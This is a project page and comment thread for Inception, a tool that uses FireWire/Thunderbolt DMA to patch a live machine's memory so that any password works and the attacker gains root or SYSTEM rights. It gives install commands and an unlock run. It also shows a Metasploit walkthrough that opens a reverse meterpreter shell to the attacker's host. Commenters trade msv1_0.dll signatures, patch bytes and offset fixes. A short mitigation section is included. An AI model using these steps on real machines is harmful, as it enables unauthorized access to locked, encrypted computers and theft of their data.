Inception is a physical memory manipulation and hacking tool exploiting PCI-based DMA. The tool can attack over FireWire, Thunderbolt, ExpressCard, PC Card and any other PCI/PCIe interfaces.

Inception aims to provide a relatively quick, stable and easy way of performing intrusive and non-intrusive memory hacks against live computers using DMA.

How it works

Inception’s modules work as follows: By presenting a Serial Bus Protocol 2 (SBP-2) unit directory to the victim machine over the IEEE1394 FireWire interface, the victim operating system thinks that a SBP-2 device has connected to the FireWire port. Since SBP-2 devices utilize Direct Memory Access (DMA) for fast, large bulk data transfers (e.g., FireWire hard drives and digital camcorders), the victim lowers its shields and enables DMA for the device. The tool now has full read/write access to the lower 4GB of RAM on the victim.

Once DMA is granted, the tool proceeds to search through available memory pages for signatures at certain offsets in the operating system’s code. Once found, the tool manipulates this code. For instance, in the unlock module, the tool short circuits the operating system’s password authentication module that is triggered if an incorrect password is entered.

After running that module you should be able to log into the victim machine using any password.

An analogy for this operation is planting an idea into the memory of the machine; the idea that every password is correct. In other words, the equivalent of a memory inception.

Awesome! But why?

The world’s forensics experts, governments and three-letter acronym agencies are using similar tools already, so why not? Inception is free, as in beer. A professional equivalent tool will set you back ~10 000 USD. Hack back!

Key data

The tool makes use of the libforensic1394 library courtesy of Freddie Witherden under a LGPL license.


Inception requires:

  • Hardware:
    • Attacker machine: Linux or Mac OS X (host / attacker machine) with a FireWire or Thunderbolt interface, or an ExpressCard/PCMCIA expansion port. Linux is currently recommended due to buggy firewire interfaces on OS X
    • Victim machine: A FireWire or Thunderbolt interface, or an ExpressCard/PCMCIA expansion port
  • Software:
    • Python 3
    • git
    • gcc (incl. g++)
    • cmake
    • pip (for automatic resolution of dependencies)
    • libforensic1394
    • msgpack


On Debian-based distributions the installation command lines can be summarized as:

sudo apt-get install git cmake g++ python3 python3-pip

On OS X, you can install the tool requirements with homebrew:

brew install git cmake python3

After installing the requirements, download and install libforensic1394:

git clone git://
cd forensic1394
cmake CMakeLists.txt
sudo make install
cd python
sudo python3 install

Download and install Inception

git clone git://
cd inception
./ install

The setup script should be able to install dependencies if you have pip installed.

General usage

  1. Connect the attacker machine (host) and the victim (target) with a FireWire cable
  2. Run Inception

Simply type:

incept [module name]

For a more complete and up-to-date description, please run:

incept -h

or see the tool home page.


As of version 0.4.0, Inception has been modularized. The current modules, and their functionality is described below.

For detailed options on usage, run:

incept [module name] -h

Note: Mavericks since 10.8.2 on Ivy Bridge (>= 2012 Macs) have enabled VT-D effectively blocking DMA requests and thwarting almost all modules. Look for vtd[0] fault entries in your log/console.


The unlock module can unlock (any password accepted) and escalate privileges to Administrator/root on almost* any powered on machine you have physical access to. module is primarily attended to do its magic against computers that utilize full disk encryption such as BitLocker, FileVault, TrueCrypt or Pointsec. There are plenty of other (and better) ways to hack a machine that doesn’t pack encryption.

The unlock module is stable on machines that has 4 GiB of main memory or less. If your the target has more then that, you need to be lucky in order to find the signatures mapped to a physical memory page frame that the tool can reach.

As of this version, it is able to unlock the following x86 and x64 operating systems:

OS Version Unlock lock screen Escalate privileges
Windows 8 8.1 Yes Yes
Windows 8 8.0 Yes Yes
Windows 7 SP1 Yes Yes
Windows 7 SP0 Yes Yes
Windows Vista SP2 Yes Yes
Windows Vista SP1 Yes Yes
Windows Vista SP0 Yes Yes
Windows XP SP3 Yes Yes
Windows XP SP2 Yes Yes
Windows XP SP1
Windows XP SP0
Mac OS X Mavericks Yes (1) Yes (1)
Mac OS X Mountain Lion Yes (2) Yes (2)
Mac OS X Lion Yes (2) Yes (2)
Mac OS X Snow Leopard Yes Yes
Mac OS X Leopard
Ubuntu (3) Saucy Yes Yes
Ubuntu Raring Yes Yes
Ubuntu Quantal Yes Yes
Ubuntu Precise Yes Yes
Ubuntu Oneiric Yes Yes
Ubuntu Natty Yes Yes
Linux Mint 13 Yes Yes
Linux Mint 12 Yes Yes
Linux Mint 12 Yes Yes

(1): Mavericks since 10.8.2 on Ivy Bridge (>= 2012 Macs) have enabled VT-D effectively blocking DMA requests and thwarting this attack. Look for vtd[0] fault entries in your log/console. (2): If FileVault 2 is enabled, the tool will only work when the operating system is unlocked as of OS X Lion. (2): Other Linux distributions that use PAM-based authentication may also work using the Ubuntu signatures.

The module also effectively enables escalation of privileges, for instance via the runas or sudo -scommands, respectively.


To unlock, simply type:

incept unlock

 _|  _|      _|    _|_|_|  _|_|_|_|  _|_|_|    _|_|_|  _|    _|_|    _|      _|
 _|  _|_|    _|  _|        _|        _|    _|    _|    _|  _|    _|  _|_|    _|
 _|  _|  _|  _|  _|        _|_|_|    _|_|_|      _|    _|  _|    _|  _|  _|  _|
 _|  _|    _|_|  _|        _|        _|          _|    _|  _|    _|  _|    _|_|
 _|  _|      _|    _|_|_|  _|_|_|_|  _|          _|    _|    _|_|    _|      _|

v.0.4.0 (C) Carsten Maartmann-Moe 2014
Download: | Twitter: @breaknenter

[?] Will potentially write to file. OK? [y/N] y
[*] Available targets (known signatures):

[1] Windows 8 MsvpPasswordValidate unlock/privilege escalation
[2] Windows 7 MsvpPasswordValidate unlock/privilege escalation
[3] Windows Vista MsvpPasswordValidate unlock/privilege escalation
[4] Windows XP MsvpPasswordValidate unlock/privilege escalation
[5] Mac OS X DirectoryService/OpenDirectory unlock/privilege escalation
[6] Ubuntu libpam unlock/privilege escalation
[7] Linux Mint libpam unlock/privilege escalation

[?] Please select target (or enter 'q' to quit): 2
[*] Selected target: Windows 7 MsvpPasswordValidate unlock/privilege escalation
[=============>                                                ]  227 MiB ( 22%)
[*] Signature found at 0xe373312 in page no. 58227
[*] Patch verified; successful


The implant module implants a (potentially memory-only) Metasploit payload directly to the volatile memory of the target machine. It integrates with MSF through the msfrpcd daemon that is included in all versions of Metasploit.

The current version only work as a proof-of-concept against Windows 7 SP1 x86. No other OSes, versions or architectures are supported, nor is there any guarantee that they will be supported in the future. If you want to change this, send me a wad of cash in unmarked dollar bills or a pull request.


To use it, start msfrpcd:

msfrpcd -P [password]

Then launch inception:

incept implant --msfpw [password] --msfopts [options]

As an example, to create a reverse TCP meterpreter shell from the target machine to your attacking host, first start the msfrpcd dameon, and then launch a console listening for callbacks.

msfrpcd -P password

In the console, we configure the receiving end of the payload. We’re setting the EXITFUNC option tothread to ensure that the target process stays alive if something should go awry:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set EXITFUNC thread
set ExitOnSession false
exploit -j

Then, in another terminal, we launch Inception:

incept implant --msfpw password --msfopts LHOST=

 _|  _|      _|    _|_|_|  _|_|_|_|  _|_|_|    _|_|_|  _|    _|_|    _|      _|
 _|  _|_|    _|  _|        _|        _|    _|    _|    _|  _|    _|  _|_|    _|
 _|  _|  _|  _|  _|        _|_|_|    _|_|_|      _|    _|  _|    _|  _|  _|  _|
 _|  _|    _|_|  _|        _|        _|          _|    _|  _|    _|  _|    _|_|
 _|  _|      _|    _|_|_|  _|_|_|_|  _|          _|    _|    _|_|    _|      _|

v.0.4.0 (C) Carsten Maartmann-Moe 2014
Download: | Twitter: @breaknenter

[?] Will potentially write to file. OK? [y/N] y
[!] This module currently only work as a proof-of-concept against Windows 7 SP1
    x86. No other OSes, versions or architectures are supported, nor is there
    any guarantee that they will be supported in the future. If you want to
    change this, send me a wad of cash in unmarked dollar bills or a pull
    request on github.
[?] What MSF payload do you want to use? windows/meterpreter/reverse_tcp
[*] Selected options:
[*] LPORT: 4444
[*] LHOST:
[*] EXITFUNC: thread
[*] Stage 1: Searcing for injection point
[================================>                             ]  537 MiB ( 53%)
[*] Signature found at 0x219d118c in page no. 137681
[*] Patching at 0x219d118c
[\] Waiting to ensure stage 1 execution
[*] Restoring memory at initial injection point
[*] Stage 2: Searching for page allocated in stage 1
[=========================>                                    ]  434 MiB ( 42%)
[*] Signature found at 0x1b2d9000 in page no. 111321
[*] Patching at 0x1b2d9000
[*] Patch verified; successful

In your MSF console, you should see something similar to this:

msf exploit(handler) > [*] Sending stage (769536 bytes) to
[*] Meterpreter session 1 opened ( -> at 2014-08-30 16:23:31 +0200

msf exploit(handler) > sessions

Active sessions

  Id  Type                   Information                            Connection
  --  ----                   -----------                            ----------
  1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ WIN-11FMQRBAMJ6 -> (

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM


Not working you say? Here’s a couple of hints:

  • First, use the -v switch to visually confirm that the tool is able to read memory from the victim.
  • Make sure you actually are connected with a IEEE134 FireWire cable (FireWire to USB converters, etc. won’t work, but 4/6/9 pin FireWire adapters do). Doh.
  • “Nofirewire devices detected on the bus”
    • First, try running the tool again.
    • If you get this error message, try a different cable and/or using a couple of converters  (such as this and this) to convert from 6/9 pin FireWire connector to 4 pin and back again. 6/9 pin FireWire cables are capable of transferring power, and this may cause trouble for some FireWire chipsets. Some FireWire cables are also known to be “straight-through” (i.e., not “crossover”), an this is known to cause trouble.
    • Are you attacking from an OS that doesn’t support hot-plugging (such as BackTrack) using a ExpressCard/etc. on the host side? Re-boot the machine with the expansion card plugged in before running Inception.
  • Are you sure you’re getting DMA? Sometimes the target machine uses an extended period of time (I’ve experienced time-spans up to around 30 secs on slow targets) installing the FireWire drivers and lowering the DMA shield; it is possible that you just didn’t wait long enough before attacking. Use the delay switch to increase the delay, and -v/–verbose to see if you actually read data. Also, looking in the Device Manager (assuming you are setting up a demo attacking Windows) may be helpful to see that a FireWire SBP2 device actually pops up when running the tool. Mind you, it is all right with a yellow exclamation mark by the device, the tool should work nevertheless.
  • Does your target use some form of endpoint protection? Some antivirus vendors specifically block FireWire DMA. Turn it off and see what happens.
  • Does your FireWire port work? Try connecting a FireWire disk and see if it is recognized. Check your BIOS setting to see that it is not disabled. Ensure that FireWire drivers are present and not removed from the system.
  • Are you getting data, but still can’t find the signature? Check the above and see the FAQ below. Also check the amount of RAM installed (FireWire max addressable memory space is 4 GiB). The code may lie above that threshold, in which case the unlock attack won’t work. This is especially true for Linux machines, where kernel code resides in high memory addresses.
  • Did Inception patch successfully, but you cannot log in? Try a non-blank password. Some OS authentication mechanisms check for blank passwords before passing control to the mechanism that Inception patches.
  • Try again. Sometimes the DMA shield fails to lower on the first try/tries.

Known bugs

  • Due to severe bugs in the Mac OS X FireWire stack IOKit, attacking from a Mac can cause a kernel panic at the target and/or host system if an error condition should occur. As of March 2012, attacking from Mac OS X is not recommended.

*) Caveats

  • Inception may not work reliably against machines with more than 4 GiB RAM, as the signatures the tool look for may be loaded at a memory address > 0xffffffff. You may still be able to exploit the target by dumping as much memory as possible and, say, search for encryption keys.
  • You may have trouble reading above 2 GiB on targets with more than 2 GiB RAM. This is due to the way the memory controller provisions physical addresses. Since there’s currently no way of detecting (over FireWire) how much physical memory the target has, the tool will continue to attempt to read memory up to the 4 GiB limit. You will see a noticeable slowdown in reading when the tool tries to read data from addresses that doesn’t map to hardware RAM.
  • OS X Lion disables DMA when the user is logged out/screen is locked and FileVault is enabled. Attacking will only work while the user is logged in, or if user switching is enabled. The user switching trick only works for  versions before 10.7.2, where the vulnerability is patched.
  • If you have a OF/EFI firmware password set on the target Mac OS X, FireWire DMA is off by default.

Attack mitigation

To stay safe and protect against FireWire DMA attacks, here’s a couple of suggestions:



  • Don’t panic – if you are using FileVault2 and OS X Lion (10.7.2) and higher, the OS will automatically turn off DMA when locked – you’re still vulnerable to attacks when unlocked, though
  • Set a firmware password


All of the above will impact FireWire in one way or the other. Unfortunately, this is a FireWire design problem, not an OS problem, and would have to be fixed in the SBP-2 protocol itself.


Inception was originally coded as a GPL replacement for winlockpwn, the Windows FireWire unlock tool made available by Adam Bolieu aka Metlstorm. winlockpwn was quite stable against older Windows XP targets, but did not perform well against more modern operating system like Windows 7 (and it is not maintained anymore). As of Linux kernel 2.6.22 Linux Distros ships with the new ‘Juju’ FireWire stack, making winlockpwn obsolete. Alas, Inception was born.

DMA attacks has been known for many years, so this is nothing new (except for the fact that I will reverse engineer new signatures and update the tool’s functionality until the problem is fixed). However, vendors generally dismiss DMA attacks as a non-issue, which I hope that the awareness that this tool generates will change. Users deserve secure devices, even when attackers gain physical access.


  1. Q: This tool is irrelevant, I can just boot the machine with [insert live CD OS here], dump the SAM and SECURITY hives and crack the passwords.
    A: No, you can’t if the target is a full disk encrypted machine. See above. This tool is designed to unlock powered on machines that utilize secure, full disk encryption. It is also far stealthier than the above attack.
  2. Q: Can’t I just use the screen_unlock.rb Metasploit script?
    A: Well you can, assuming that you already have a shell at the target machine. If you have that, you probably won’t need this tool.
  3. Q: I use full disk encryption. Your tool is moot.
    A: No, you’re missing the point: The tool is intended to be used against full disk encrypted machines. Se FAQ 1.
  4. Q: This is FUD! I would never let anyone plug anything into my machine! I’m never more than an arm’s length from my computer. In fact, my machine is the only object I have a non-platonic relationship with, and I would never let my eyes off her. No one would go to the trouble of hacking a single machine anyway.
    A: Good for you. The attack is dependent on physical access to a box in a powered on or standby state, so likely you’ll not be hacked. However, there are organizations out there that would go to utmost lengths to be able to access machines in seconds without leaving a trace. If you are not a target of these organizations, you’re likely never going to be hacked this way. However, if it is your job to be paranoid, you should know about this attack and make an informed decision to protect yourself.
  5. Q: I’ve just glued/desoldered all my Firewire ports. Your move, mhuddafuckah.
    A: Ahem. See the answer to FAQ 7.
  6. Q: Wasn’t this fixed years ago? I remember hearing about this in the olden days (2004).
    A: Sadly, no. And yes, the problem is old, but it is not entirely fixable with a driver update, a patch or a new OS version. The problem is in the Firewire specs. All OS vendors that want to include Firewire drivers that are OHCI compliant and works out of the box with SBP-2 devices are vulnerable in some degree.
  7. Q: Isn’t FireWire a dying horse? Few laptops ship with FireWire ports these days, which makes Inception a useless tool.
    A: You can use any interface that expands the PCIe bus, for example PCMCIA, ExpressCards, the new Thunderbolt interface and perhaps SD/IO to hotplug a FireWire interface into the victim machine. The OS will install the necessary drivers on the fly, even when the machine is locked.
  8. Q: Your tool isn’t working.
    A: That’s not a question. Check the troubleshooting section above first, and when you have made sure that the error source isn’t between the chair and the keyboard, preferably open an issue at github describing the problem, including:
    • Your host OS
    • The target OS (For Windows, the output of running winver.exe on the machine, format:, for Linux the output of uname -a and perhaps cat /etc/lsb-release)
    • The target CPU architecture (x86/x64, etc.)
    • Output of the tool
    • Memory size of target

License / donate

The tool makes use of the libforensic1394 library courtesy of Freddie Witherden under a LGPL license.

If you like tool, and especially if you use it successfully in a digital investigation, please consider making a donation to me:

My Bitcoin address


362 Responses to “Inception”

  1. killerbiz

    Thks for this great tool !
    Does it work with smartcard logon? (user/passwd desactivated)
    If not it could be great to implement it.
    Best regards,

    • Carsten

      Maybe. The smart card reader would have to communicate with the OS in some way, and that communication would necessarily result in pages being loaded into memory and executed. If the smart card reader needs it’s own authentication modules loaded, I could probably need to reverse engineer the driver to understand how to eliminate the checks that verifies your smart card. Unfortunately, I’m not currently in possession of a smart card reader.

      If you have a reader available, try it out. The existing patching of msv1_0.dll may very well work against smart card authentication as well.

      • killerbiz

        Thks for the fast answer.
        I’ll test it against smart card soon and will keep you aware of the result.

        ps: great results on the standard log/pass authent !

  2. tekkenhead

    I had the same problem with windows xp sp2 so I changed the offset and signature to this:


    I haven’t tried it out. But is should NOP the jump function as in the other OS’s listed. I also had to change the vista pageoffset to suit my needs as well to get it to work for me.

    • Carsten

      Thanks, I’ll check it out. The vista signature is quite old, so I’m not surprised it has changed. Do you have it available?

  3. tekkenhead

    I wanted to say its a great program. So is winlockpwn I got it to work for windows xp after tweaking the signature offsets and it was a great way to learn about IDA.

    I was wondering if in the next version of ftwautopwn if there could be a way of trying older or multiple pageoffsets instead of manualng updating the config.cfg file. If I am not mistaken I think you can only apply multiple patches to the same file now.


    • Carsten

      Thanks. That is exactly what I’m working on: improving signature robustness and parallel search at multiple offsets. Stand by for a new release sometime during the next few weeks.

  4. tekkenhead

    Here is the pageoffset I used for Vista Ultimate with SP1.

    I also wanted to let you know I used a 4 pin cable with a 6 pin male adapter and it worked great.

  5. jan

    I am having trouble getting this to work. The SBP2 device shows up in the device manager of the target machine, as well as a disk drive (UNKNOWN VENDOR AND MODEL) with a yellow question mark on it. It says ‘cannot start’. the error I get is:

    Please select target (or enter ‘q’ to quit): 6
    [+] You have selected: Windows XP SP3 (x86) msv1_0.dll MsvpPasswordValidate technique
    Phase 1:
    Using signature: 0x83f8107511b0018b
    Using patch: 0x83f8109090b0018b
    Using offset: 0x8aa (2218)
    Phase 2:
    Using signature: 0x83f8107511b0018b
    Using patch: 0x83f8109090b0018b
    Using offset: 0×862 (2146)
    Traceback (most recent call last):SBP2, please wait 1 seconds or press Ctrl+C
    File “./”, line 80, in
    File “./”, line 76, in main
    File “/home/jan/FTWAutopwn/ftwautopwn/”, line 129, in run
    d = initialize_fw(d)
    File “/home/jan/FTWAutopwn/ftwautopwn/”, line 254, in initialize_fw
    d = b.devices()[0]
    IndexError: list index out of range

    any ideas?

    • jan

      Just a little more info. I booted the target system (thinkpad r500) into ubuntu 9.04 to see if windows was the issue. I get the same error. I did increase the delay time on both systems with no positive result. I took the source computer (thinkpad r500 also) and plugged it into my desktop system. There the ftwautopwn ran but resulted in the same as a previous poster along the lines of

      [+] Searching for signature, 379 MiB so far.
      [-] Looks like we’re not getting any data. We could be outside memory
      boundaries, or simply not have DMA. Try using -v/–verbose to debug.

      so the ftwautopwn can connect to the desktop just fine, but not the laptops (I also tried xp sp3 on a thinkpad r400 as target but can’t connect to it either)

      The target xp laptop can connect to my xp desktop and do filesharing via firewire with no problem, so I know the hardware on all computers is ok.

      I am out of ideas.

      • Carsten

        Hi Jan, unfortunately it is hard for me to debug this remotely. If you are able to use the tool against one machine, but not another, and booting into another OS at the target doesn’t help, it is likely a hardware problem. You could try to create another FireWire port by plugging in an ExpressCard etc. to se if that resolves the issue.

        • jan

          Ordered a new cable and firewire cards to plug into laptop. Will let you know how it goes. Thanks for the reply

          • jan

            I got 2 pc card firewir adapters to shove into the laptops. and the program then executes.

            However, I still get no result. what I see is along the lines reported by a previous poster:
            Continue? [Y/n]: y
            [+] Searching for signature, 379 MiB so far.
            [-] Looks like we’re not getting any data. We could be outside memory
            boundaries, or simply not have DMA. Try using -v/–verbose to debug.

            I see it scanning through changing data values, but never finds a match. I tried 3 different computers of XP with SP3 in 2 different languages (eng, and german). No luck. I disassembled the dll file with IDA Pro and the offsets and everything looks ok.

            No clue what is happening, but my chance to demonstrate the party trick has come and gone….

          • Carsten

            That’s weird. Sounds like you are not getting DMA. Maybe you could try to dump the entire memory using the tool volatility and inspect the result? Language should have nothing to do with this.

            Edit: I’ve never had any problems like this using the tool – at least not against Windows XP. The signatures are very stable, and as you say, you were able to dissassemble the msv1_0.dll file yourself to confirm them. What kind of hardware are you using on the attacking side?

  6. jan

    Using a thinkpad R500 on the attacking side. I bought 2 types of firewire card, one express card and one pcmcia card, since the laptops have both types of slots. I tried all combinations of configurations but none work. however, the type of card I have in the slot determines the data I get when we are out of memory range. For example, when it reads in the region about 3GB where there is no memory I either see all fffffff or 000000 depending on the card. Where there is memory, I see rapidly changing memory contents, so I think I have access to at least some memory.

    I am going to dig up my old emachines laptop and put the pcmcia card in it to see what is up.

    can you tell me how to do a memory dump using volatility?

  7. marc

    on a windows 7 sp1 32bit:

    the memory location is found and the location patched.
    when I enter a random password, I get an error “RPC service unavailable” and can not login, also not with the correct password. There is no difference if the user is local or a domain user and if there is network connectivity or not.

    any idea how to get this working in such a case?

    • Carsten

      Sounds like a false positive (ie. that there are more than one match in-memory). Do you get this error consistently? I’m working on creating more stable signatures for Win7, both 32 and 64 bit, unfortunately the progress is a bit slow…

      • marc

        Hi Carsten,

        well I tried 3 times with the same result (rebooting, and working with the account for some time), so I’d say its consistently.

        • Carsten

          Hi Mark sorry for the late reply. As you may see from this page, I’ve been busy coding and renaming the tool. Could you test the new tool against your Win7 box (as described above)?

          The new matching algorithm will hopefully solve your problems.

    • feet customer service

      Hey, I think your site might be having browser compatibility issues.

      When I look at your blog site in Ie, it looks fine but when opening in Internet Explorer, it has some overlapping.

      I just wanted to give you a quick heads up! Other then that, terrific blog!

    • wedding dresses

      Hello, I think your blog might be having browser compatibility issues.
      When I look at your blog site in Safari, it looks fine but when opening in Internet Explorer, it has some overlapping.
      I just wanted to give you a quick heads up! Other then that, fantastic

    • oncoming infection

      Oh my goodness! Incredible article dude! Thanks, However I am encountering difficulties with your RSS.
      I don’t understand why I am unable to subscribe to it. Is there anyone
      else having the same RSS problems? Anyone who knows the answer will you
      kindly respond? Thanks!!

  8. ncfa

    hi Carsten
    it is really great tool. thank you for that.
    the tool was working for 32 bit systems but when i tried it on a machine that has 64 bit Windows 7, it didn’t work. i checked the signature and offset value of my system, all is ok. but not working. is there a critical point that migth be useful for 64 bit operating systems?

    And also i tried to find signature for Linux and Mac systems. but i couldn’t find any useful info. how can i find the signature and offset values for Linux and Mac operating systems?

    • Beka

      Hi Carsten,
      I did some tests and with the same results as ncfa, Windows 7 32 bits works great but none of the 64 bits workstations seems to work.

      • Carsten

        Hi, thanks for alerting me. On both my 64-bit Win7 machines, inception is working great. Can you open a ticket at github with:

        – Your host OS
        – The target:
        – OS (For Windows, the output of running winver.exe on the machine, format:, for Linux the output of uname -a and perhaps cat /etc/lsb-release)
        – Amount of physical memory (RAM)
        – The target CPU architecture (x86/x64, etc.)
        – Output of the tool

  9. tekkenhead

    Can you give me more info on how to use -f switch in I have some virtualbox images and would like test. I also have vmware if I need that too. Thanks.

    • Carsten

      Unfortunately, Virtualbox doesn’t store the memory from snapshots in binary data files like VMware, but rather use a compressed (?) format. FTWA does currently not support this format. You can use the -f switch to search through VMware memory (.vmem) files located in your vm folder.

      If you venture into dissecting the virtualbox format, drop me a note.

      • tekkenhead

        Thanks for the info, but I decided not to redo my images in vmware or try and convert them right now.

        I have recently tried your version and it works great. But there is a problem I ran in too. I got a keyboardinput error with a patchoffset error when running it against a windows xp machine. I looked at your code and you didn’t have a ‘patchoffset': 0x00′ in the under the windows xp settings. I changed that and the program worked fine. I only mention that if someone runs into the same error.

        I also deleted the 5 lines that that dealt with offset 0x927 and added offset 0x9B6 instead under the other offsets. I recently upgraded a old windows xp sp2 to sp3 and found a new offset as well. Here are my signatures for xp: offsets': [0x0126, 0x8aa, 0x862, 0x946, 0x09B6]. I know xp is old but trying to be through.

        I tried your program under windows 7×86 and everything works great and same can be said under windows7x64 including sp1 but I didn’t have any antivirus running and it was a fresh install, but completely updated. If you can also add signature offset 0x80F for vista that would be cool. I am currently working on vista trying to find all signatures. Thanks again.

  10. Alex Cheng

    Hi, I’d just checked my laptops and they have a 4 pin female firewire port if I’m not wrong. So to connect from a laptop to another laptop one will need a 4 pin to 4 pin firewire cable?

    Thanks in advance.

  11. Alex Cheng

    One slight problem, I cannot login to active directory after reboot. i’m Not connected to LAN, at home now. not sure why. Have to get back to IT next Monday to see if it can be fixed =/

    • sbenting

      I ran across this, as well. For a domain account, it appears to leave something behind even after a reboot until you reconnect to the network and log in with the correct password again. Once it reauthenticates against the domain controller, all should work fine.

      • Carsten

        I guess this is Windows cached credentials playing a trick on the AD authentication. I’ll have a look and see if it is possible to patch so that the erroneous password is not cached.

      • SS

        Found something interesting here:
        “Remember that once the memory is patched and the the user who locked the screen is part of a domain you need to immediately revert the patching by issuing the ” screen_unlock -r” command after you log into Win7 with ANY password, or the domain account will be locked after a while.”
        I can confirm that the statement above is true, because after patching a Win7 x64 Enterprise laptop (part of domain) with Inception I was able to log in with a random password a few times to test, but after a while (perhaps a few hours) the domain account got locked.

  12. tekkenhead

    Wanted to say thanks for the credit on the readme. Been pretty busy as of late to work on this right now. But wanted to say I love the new name!

  13. Will

    Wow, great tool! I finally got an Ubuntu LiveUSB working on my Mac (the EFI makes it really hard), and I was able to try it out. The memory dump worked great! I was surprised at the amount of human-readable text in the first few megs of RAM from a dump of a Mac. Quite a few funny random things strewn about in there!

    However, I was unfortunately unable to use this software to actually extract a password or disable the unlock screen. Is there anything that I can do to help make a signature that works with OS X 10.7/10.8?

    Also, it would be great if the tool was capable of either writing to a custom file location or even Stdout. When using a LiveCD with no persistence, RAM dumps are very space-expensive, so being able to write to an external device or a FIFO or something can be useful.

    • Carsten

      The signatures for OS X for unlocking are outdated, I’m working on “reversing” new ones (slowly, I don’t have much spare time after working 60-80 hrs / wk). If you’d like to help, this is where you could contribute. You could also fork my project on github, make improvements and issue a pull request for inclusion in Inception.

      Memory dumping and extraction of passwords should work though, I’ve tested that myself on Lion.

      Good suggestions regarding output file – I’ll implement that in the next minor version.

      • NB

        how can I redirect the output on an external drive? I did not find nothing in the “help” of this tool …thank you

  14. Skrotor

    Hi! Great tool.

    I tried the tool against a Ubuntu 11.10 and got a successful result. However, when I try to unlock the screen goes black and throws me back to the locked screen. Something obviously happened since im no longer getting “invalid password” but Im still not able to access the system.


    Regards Skrotor

    • Carsten

      Hmm. Let me try that on my own machine, it may be that the tool finds a false positive and that I will need to expand the signatures to make them more accurate. Can you post the output of the following commands here?

      uname -a
      cat /etc/lsb-release

      • Skrotor

        Sure can!

        [email protected]:~$ uname -a
        Linux luit-HP-Compaq-nc8230-DX443AV 3.0.0-12-generic #20-Ubuntu SMP Fri Oct 7 14:50:42 UTC 2011 i686 i686 i386 GNU/Linux
        [email protected]:~$ cat /etc/lsb-release
        DISTRIB_DESCRIPTION=”Ubuntu 11.10″

          • Carsten

            I was unable to reproduce with the Ubuntu copy I had back home, but I’m doing a re-install to verify. If you want, you could try running the tool several times (if it finds several signatures, we know the culprit is a false positive)

          • Skrotor

            Ok, here is the output.

            First run:

            [*] Signature found at 0x3d7c6de0 (@page # 251846)
            [*] Data written: 0x0x31db
            [*] Data read: 0x0x31db
            [*] Write-back verified; patching successful

            The second run didn’t give any output after completing.

          • Carsten

            Aha – you’re using an old version of the tool – that offset is from the experimental signatures that were replaced some time ago. Do a git pull and try again.

            Let me know if that doesn’t solve your problems. A word of advice if you are attacking in the field: Ubuntu loads its kernel at high physical memory addresses. Depending on the physical memory size and layout of the target (if the machine has a dedicated graphics card, etc.) you may experience inability to read memory content over the 2/4 GiB mark. If the kernel is loaded above this mark, the unlock won’t work. Memory dumping will still work fine, though.

            Lycka till ;-)

          • Skrotor

            Strange, i hit the same signature even after a git pull, thoughts?

            Tack :P

  15. Tom


    Tried your program at home and it worked perfectly. Then took it to uni to try out. However it says that it worked but when I try to log on to the PC, it says incorrect password.

    The target pc is running XP and the attacker is running latest ubuntu.

    Could it be because my account at uni is a network one?



    • Carsten

      Correct. As your university PC probably authenticates against a central domain controller, the trick of allowing local blank passwords won’t work (you don’t have control over the DC password checking functionality). I’m currently considering migrating the Windows signatures to patch the local function that decides if accounts needs to authenticate at all, which would probably fix domain logons as well. This is a future improvement, and not implemented at the moment.

      Depending on the state of the domain PC you are trying to hack, you may be able to log in locally (i.e., “Log into computer XXXX”) instead of logging into the domain. You could also try to disconnect the PC from the network before trying to log in.

      Also, depending on the legislation where you live, hacking your university’s property may be punishable by law. I would suggest testing this in a simulated environment rather than having a go at public computers, unless of course you have permission to do so.

      • Tom

        Cheers for the reply,

        I’m trying to use it in a demo I have on wednesday, should be really good.

        No problem, I’ll give them things a try tomorrow and if it still doesn’t work I’ll take in my desktop haha

        Thanks again,


  16. tekkenhead

    I just ran your new version and I have to say WOW. It is alot faster then the previous versions. Nice.

  17. Goldfish

    Is there a download available for the Ubuntu live CD complete with this software?

    • Carsten

      If you follow the instructions above, you’ll be able to install on a Ubuntu live cd.

      I have no plans to distribute .deb packages.

      • goldfish

        Hi Carsten,
        I followed all instructions exactly. This is the setup:
        Ubuntu 11.04 i686
        python3 inception-0.13 libforensic1394-0.2
        no errors during buid.

        ls /dev | grep fw results in fw0
        sudo modprobe -r ohci1394 sbp2 eth1394 dv1394 raw1394 video1394 removes the fw0 port.

        If I fire incept then I get the error “No firewire devices detected on the bus”.

        lsmod gives firewire_ohci as drivers, not the libforensic drivers.
        sudo modprobe -r ohci1394 sbp2 eth1394 dv1394 raw1394 video1394 removes the fw0 port. Incept places the same drivers back (firewire_uhci).
        What am I doing wrong?

        • Carsten

          What type of system are you attacking? Is it connected when running inception? Have you tried attacking other systems?

          • goldfish

            It is a Dell E4300, connecting to another laptop (Win7) does not make a difference. Is there a test mode to perform the steps that you do with Winlockpwn?

          • Carsten

            You must be connected to the other machine when running inception. The other machine’s FireWire device must work. Does a FireWire device pop up in device manager on the target?

            I don’t understand what you mean by ‘test mode’. You can use ‘-f’ to attack virtual machines, if that is what you’re aiming at.

        • Carsten

          I don’t understand why you are removing the FireWire modules. libforensic is a library, not a module. Suggest you reboot your system and try to run inception again – it will load the correct modules automatically.

          • goldfish

            Ah, I understood libforensics were replacement drivers. My bad.
            I tested now with a XP SP3 box. After connecting the firewire and firing inception the configuration screen displays a new device “Unknown Vendor and Model IEEE1394 SBP2 device”.
            I also tested a Win7 box, this displayed “Linux Firewire Unknown Model”.

            Where did I do something wrong?

          • Carsten

            And did you try to reboot the host system as I suggested above? I understand that you attack from a live CD and that you’ll have to reinstall Inception, but as you seem to have loaded/unloaded quite a few FireWire modules that may be the source of the problem.

            Also, if you are using a FireWire expansion card on the host side, make sure you keep this plugged in while rebooting. Ubuntu’s support for hotplugging is not really stable.

          • goldfish

            The host was rebooted, Inception reinstalled. The E4300 has a built-in firewire port so this is not the problem.

          • Carsten

            Hmm. I’m unable to reproduce this error on any of my hardware. I’ve tested this on 3 different Lenovo computers and two Apple Macs, using both built-in and expansion ports. I’ve never heard of this problem before.

            I don’t have any LiveCDs to test from though, and that may be the issue. Suggest you try to attack from a permanent install, and/or another machine (or an expansion card). This may be a HW problem at your DELL.

            Failing both attacking from a permanent install and another machine, please open a ticket at github describing the problem with as much detail as possible (HW, chipsets, OS version, inception version, etc.).

          • goldfish

